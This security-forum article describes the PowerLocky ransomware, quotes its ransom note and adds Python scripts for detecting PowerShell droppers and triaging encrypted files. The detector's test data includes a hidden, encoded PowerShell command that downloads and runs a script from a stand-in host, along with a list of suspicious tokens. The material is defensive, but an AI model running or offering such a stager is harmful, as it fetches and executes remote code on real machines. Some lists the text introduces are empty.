Remove PowerLocky Ransomware and Restore .locky Encrypted Files - How to, Technology and PC Security Forum

Remove PowerLocky Ransomware and Restore .locky Encrypted Files

A ransomware virus named PowerLocky has been reported to infect users, encrypt the files on infected computers and append the .locky file extension to them. PowerLocky also leaves a ransom note that extorts roughly $500, or about 0.74 BTC, from the victim. Researchers report that PowerLocky takes its name from two established ransomware families, Locky and PowerWare. Anyone who has fallen victim to this virus is advised to proceed with care and to read this article to learn how to remove PowerLocky and attempt to restore their files.

Threat Summary

Short Description: PowerLocky encrypts files with AES-128 and demands a ransom payment of about 0.74 BTC (roughly $500) for decryption.
Symptoms: Files are encrypted and become inaccessible. A ransom note with payment instructions is dropped as a “_HELP_instructions.html” file.
Distribution Method: PowerShell, spam e-mails, e-mail attachments, file-sharing networks.
Data Recovery: A sector-level file recovery tool may bring back some deleted originals, but it does not decrypt the .locky files themselves, and it only helps if the drive has not been overwritten or reformatted since the infection.

PowerLocky Ransomware – Distribution Methods

To reach as many PCs as possible, PowerLocky may be spread by several methods. One of them is spam e-mail campaigns whose messages imitate well-known services or offers, for example:

  • “Windows Free Upgrade Is Here”.
  • “Your PayPal Account Has Been Suspended.”
  • “Your Bank Account Receipt”.
  • “Your Debit Card Has Been Rendered Inactive”.

When a user opens such an e-mail, he or she may find either a malicious attachment or a malicious URL, and either one can lead to infection of the computer in several ways:

  • Malicious redirects to web links that cause infection via drive-by download.
  • Infection via an exploit kit.
  • Infection via malicious macros in booby-trapped Microsoft Office documents, or via scripted Adobe PDF documents.
  • Infection via a malicious .js (JavaScript) file.

PowerLocky Ransomware – Detailed Information

Once PowerLocky has infected a PC, it may or may not drop a malicious payload to disk. PowerWare is a fileless ransomware that runs as a PowerShell script, so if that component is used the infection can proceed straight to the encryption routine without writing an executable. If the virus does use malicious files, it may drop them in the file names and folders that ransomware commonly uses.
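The fileless PowerShell path described above leaves little on disk, so the place to catch it is process-creation telemetry: a PowerShell process whose parent is an Office application, launched with a hidden window and an -EncodedCommand blob. The following detection logic is an added example written for this article, not code from the original page or from any vendor; the record field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1 by assumption, and the two sample records are constructed, not real telemetry.

```python
"""Flag PowerShell launched by Office and decode its -EncodedCommand payload.

Added example for this article. Records are constructed; the field names
(Image, ParentImage, CommandLine) are assumed to follow Sysmon Event ID 1.
"""
import base64
import re
from typing import Optional

# Office applications whose child PowerShell processes deserve a hard look.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Substrings common in macro-launched PowerShell stagers. Each is harmless on
# its own; the combination with an Office parent is what matters.
SUSPICIOUS_TOKENS = (
    "-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
    "bypass", "downloadstring", "iex", "invoke-expression",
)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?i)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(record: dict) -> list:
    """Return the reasons a process-creation record looks like a PowerShell dropper.

    An empty list means nothing stood out. Only PowerShell images are examined.
    """
    reasons = []
    if basename(record["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    parent = basename(record["ParentImage"])
    if parent in OFFICE_PARENTS:
        reasons.append(f"PowerShell spawned by Office process {parent}")
    cmdline = record["CommandLine"]
    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded command decodes to: " + script.strip())
    # Search both the raw command line and the decoded script.
    haystack = (cmdline + " " + (script or "")).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in haystack]
    if hits:
        reasons.append("suspicious tokens: " + ", ".join(hits))
    return reasons


# --- constructed sample records (not real telemetry) ---
STAGER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
STAGER_B64 = base64.b64encode(STAGER_SCRIPT.encode("utf-16-le")).decode("ascii")

MALICIOUS = {
    "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {STAGER_B64}",
}
BENIGN = {
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
}

if __name__ == "__main__":
    for label, rec in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, "->", assess(rec) or "nothing flagged")
```

The decoder matters more than the token list: an encoded command hides DownloadString and IEX from any rule that only inspects the raw command line, so decode first and then match on both.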

Several anti-malware products detect PowerLocky’s main executable; the file may be executed directly or simply dropped on the computer for later use:


Once PowerLocky’s encryption routine starts, the ransomware scans the disk for files with the following extensions and encrypts every one it finds:


After encrypting a file, PowerLocky appends the .locky extension to its name, for instance:


When encryption is finished, PowerLocky drops an .html file named “_HELP_instructions.html” containing the following ransom instructions:

“We present a special software Locky Decrypter
which allows to decrypt and return control to all your encrypted files.
How to buy Locky decrypter?
1. Download and install Multibit application. This will give you your own Bitcoin-wallet address. You can find it under the “Request” tab. Paste this in the “Your BTC-address” field below.
2. Buy Bitcoins, the price is 500 $ / 0.74290893 BTC and send it to your own Bitcoin-wallet address, they will show up in the Multibit app that you installed earlier. From there, hit the “Send” tab. Send the remaining BTC (bitcoin) to this Bitcoin-wallet address: {Unique-BTC-Address}
Now submit the form below, only if you’ve actually sent the Bitcoins. Upon manual verification of the transaction, you will receive the decrypter through email within 12 hours. ALL of your files/data will then be unlocked and decrypted automatically, HTML ransom files will also be removed.
Do NOT remove HTML ransom files or try to temper files in any way, because decrypter will not work anymore.
Please remember this is the only way to ever regain access to your files again!”

Source: Infected Users

As the note shows, the victim is told to use the Multibit wallet to pay the ransom in Bitcoin. This is the payment method of choice for ransomware gangs because Bitcoin is pseudonymous: the transaction is recorded on a public ledger, but the wallet address is not tied to a real-world identity, which makes the recipient hard to attribute. Note that the address and the note itself are useful evidence, so keep a copy before cleaning the machine.
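Before removal, an incident responder wants to know how far the encryption got and what the note demands. The script below, an added example written for this article rather than code from the original page, walks a directory tree, lists the .locky files, recovers their original names by stripping the appended extension, finds every _HELP_instructions.html and pulls the price and wallet address out of the first one. The sample tree and note are constructed in a temporary directory, and the wallet address in the sample is a placeholder, not a real one.

```python
"""Triage a directory tree after a PowerLocky-style infection.

Added example for this article. The sample files, note and wallet address are
constructed placeholders; nothing here comes from a real infection.
"""
import os
import re
import tempfile

NOTE_NAME = "_HELP_instructions.html"
ENCRYPTED_EXT = ".locky"

# "500 $ / 0.74290893 BTC" as it appears in the note quoted in the article.
PRICE_RE = re.compile(r"(\d+)\s*\$\s*/\s*(\d+\.\d+)\s*BTC")
# Legacy Bitcoin address: base58, starts with 1 or 3, 26-35 characters.
ADDR_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
TAG_RE = re.compile(r"<[^>]+>")


def parse_note(html: str) -> dict:
    """Pull the ransom amount and wallet address out of a ransom note body."""
    text = TAG_RE.sub(" ", html)  # drop tags so a tag boundary cannot split a match
    info = {"usd": None, "btc": None, "address": None}
    m = PRICE_RE.search(text)
    if m:
        info["usd"] = int(m.group(1))
        info["btc"] = float(m.group(2))
    m = ADDR_RE.search(text)
    if m:
        info["address"] = m.group(0)
    return info


def original_name(encrypted_path: str) -> str:
    """Strip the appended .locky extension to recover the original file name."""
    name = os.path.basename(encrypted_path)
    if name.lower().endswith(ENCRYPTED_EXT):
        return name[:-len(ENCRYPTED_EXT)]
    return name


def triage(root: str) -> dict:
    """Walk `root`; return encrypted files, ransom note paths and the parsed note."""
    encrypted, notes, note = [], [], None
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(ENCRYPTED_EXT):
                encrypted.append(path)
            elif name == NOTE_NAME:
                notes.append(path)
                if note is None:  # every copy carries the same demand
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        note = parse_note(fh.read())
    return {"encrypted": sorted(encrypted), "notes": sorted(notes), "note": note}


# --- constructed sample (placeholder address, not a real wallet) ---
SAMPLE_ADDRESS = "1DemoAddrNotReaXXXXXXXXXXXXXXXXXXX"
SAMPLE_NOTE = (
    "<html><body><p>We present a special software Locky Decrypter</p>"
    "<p>Buy Bitcoins, the price is 500 $ / 0.74290893 BTC</p>"
    f"<p>Send the remaining BTC to this Bitcoin-wallet address: {SAMPLE_ADDRESS}</p>"
    "</body></html>"
)
SAMPLE_FILES = {
    "docs/report.docx.locky": b"\x00\x11\x22",
    "docs/budget.xlsx.locky": b"\x33\x44",
    "pictures/holiday.jpg.locky": b"\x55",
    "docs/readme.txt": b"clean file",
}


def build_sample(root: str) -> None:
    """Create a small directory tree that looks like a PowerLocky aftermath."""
    for rel, data in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    for sub in ("docs", "pictures"):
        with open(os.path.join(root, sub, NOTE_NAME), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_NOTE)


def run_demo() -> dict:
    """Build the sample tree in a temp dir, triage it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        report = triage(root)
    report["originals"] = [original_name(p) for p in report["encrypted"]]
    return report


if __name__ == "__main__":
    r = run_demo()
    print(f"{len(r['encrypted'])} encrypted files, {len(r['notes'])} ransom notes")
    print("demand:", r["note"])
    print("original names:", r["originals"])
```

Run it against a mounted image or a file share with `triage(path)`; the list of original names is what you hand to whoever owns the backups, and the parsed address is what goes into the incident record.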

PowerLocky Ransomware Virus – Removal and File Restoration

Security experts strongly recommend not paying the ransom. If you have decided not to pay, follow the step-by-step removal instructions provided below; they are arranged in order for maximum effectiveness. If you cannot find and remove every object and process associated with PowerLocky manually, we advise you to try an automatic removal solution: an advanced anti-malware product that removes the threat permanently without touching the encrypted files and protects the PC in the future.

Because files encrypted by PowerLocky have most likely been ciphered with AES-128, it is not currently possible to decode them directly without the key. We will update this article as soon as a decryptor is released to the public. In the meantime, we suggest that you try the alternative methods in step “3. Restore files encrypted by PowerLocky.”


Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having also graduated in Marketing, Ventsislav has a passion for discovering new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecurity and is a strong believer in basic education of every user towards online safety.
